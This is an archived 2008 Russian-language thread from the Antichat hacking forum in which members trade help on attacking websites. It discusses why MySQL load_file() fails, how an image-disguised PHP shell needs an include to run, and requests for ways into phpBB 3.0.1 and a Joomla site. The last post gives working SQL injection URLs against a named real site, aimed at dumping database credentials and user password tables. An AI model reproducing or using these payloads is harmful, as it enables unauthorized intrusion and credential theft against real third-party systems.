ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

04.10.2008, 18:57
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме: 2693408
Репутация:
861
|
|
Велемир, напиши по порядку действия, которые ты делаешь. И не забывай, что шелл-картинка работает только при инклюде.
|
|
|

04.10.2008, 20:02
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме: 458686
Репутация:
-25
|
|
PhpBB 3.0.1 перерыл всё могет кто подскажет что нить????
http://forum.tvingo.ru
|
|
|

04.10.2008, 23:37
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
Сообщение от n0ne
Велемир, напиши по порядку действия, которые ты делаешь. И не забывай, что шелл-картинка работает только при инклюде.
Если через PHP include,то его я пока не нашёл.Load_File() не читает почему-то,хотя несколько условий соблюдаются:
1.Фаил расположен на сервере
2.Hex значения принимаются
Но вот насчёт третьего условия (права доступа к файлу) я сомневаюсь,так как при пхп инклуде и при лоад файле пользователи от разных приложений (я так думаю,но не факт,что это так)) ),ибо при пхп инклуде всё выходит.Запрет на load_file()...может,и действительно запрет,так как доказать я этого не смогу всвязи с отсутствием вывода ошибок.А так было бы высело почитать файлики  .На одном сервере так вообще были рутовые права,т.к. бд под рутом была,что достаточно редко бывает, а лоад файлом прочесть ничего не смог.Вот и облом  .Кто-то так пошутил нехорошо)))
Кстати,вопрос в студию,который меня очень долго мучает: От каких серверных(или Бог знает каких) настроек зависит вывод списка директорий с помощь load_file() ? Пару раз всего смог так наслаждаться прогулкой по серверу  
|
|
|

05.10.2008, 00:09
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме: 458686
Репутация:
-25
|
|
Это капец! Здесь одни гуру сидят и про какойто phpBB 3.0.1 ничего сказать не могут!
|
|
|

05.10.2008, 00:45
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме: 2693408
Репутация:
861
|
|
Велемир, ты очень много всего сказал и из этого дельного - пара фраз)) Короче, load_file() может не работать из-за выключенного file_priv на пользователе из-под которого ты работаешь.
И ещё одно - load_file() вообще не исполняет php код. Так что шелл-картинка не заработает через load_file().
upd:
Чтоб узнать есть ли права на чтение файлов с помощью load_file() не обязательно иметь вывод ошибок. Тем более даже вывод ошибок ничего не даст, за редким исключением.
Надеюсь, на твои вопросы ответил, ибо вообще их не понял)
|
|
|

05.10.2008, 00:46
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
А чё сказать то ? Матом послать чтоли с форумом впридачу ? Выражай хоть мысли хоть как-то отражающие суть твоей проблемы,тогда и ответит кто-нибудь.И потом,не все сидят тут целый день.Как правило,у тех же *Гуру* и своих дел хватает.
|
|
|

05.10.2008, 00:49
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме: 2693408
Репутация:
861
|
|
geforce,
http://milw0rm.com/
http://packetstormsecurity.net/
http://google.com/
з.ы. если ты про надпись "Гуру" у слова "Репутация" под аватаркой, то мне тебя жаль :'(
|
|
|

05.10.2008, 02:47
|
|
Новичок
Регистрация: 25.04.2007
Сообщений: 16
Провел на форуме: 110445
Репутация:
1
|
|
http://xxxx.org/ar/index.php?option=com_content&task=blogsection&id=7 &Itemid=31
how to inject this
i tried after
http://xxxx.org/ar/index.php?option=com_content&task=blogsection&id=7 '&Itemid=31
and
http://xxxx.org/ar/index.php?option=com_content&task=blogsection&id=7 &Itemid=31'
doesnt work is this filtered how to bybass
waitting.............................
|
|
|

05.10.2008, 11:47
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме: 9098076
Репутация:
4303
|
|
geforce, тебе тут никто ничего не должен
|
|
|

05.10.2008, 14:01
|
|
Познающий
Регистрация: 07.08.2006
Сообщений: 66
Провел на форуме: 2256830
Репутация:
94
|
|
Народ вот такая проблема
Сайт:http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat (version(),0x3a,database(),0x3a,user()),8/*
Дальше роем и находим таблицы
user
-user_name
-user_password
tbl_user
-u_username
-u_password
-u_email
punbb_users
-id
-username
-password
-email
составляем запросы
Код:
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,u_username,u_password),8+from+tbl_user+limit+1,1/*
и
Код:
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8+from+punbb_users+limit+1,1/*
Но сайт упорно не хочет показывать содержимое таблиц
что делать чтобы оно показало?
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|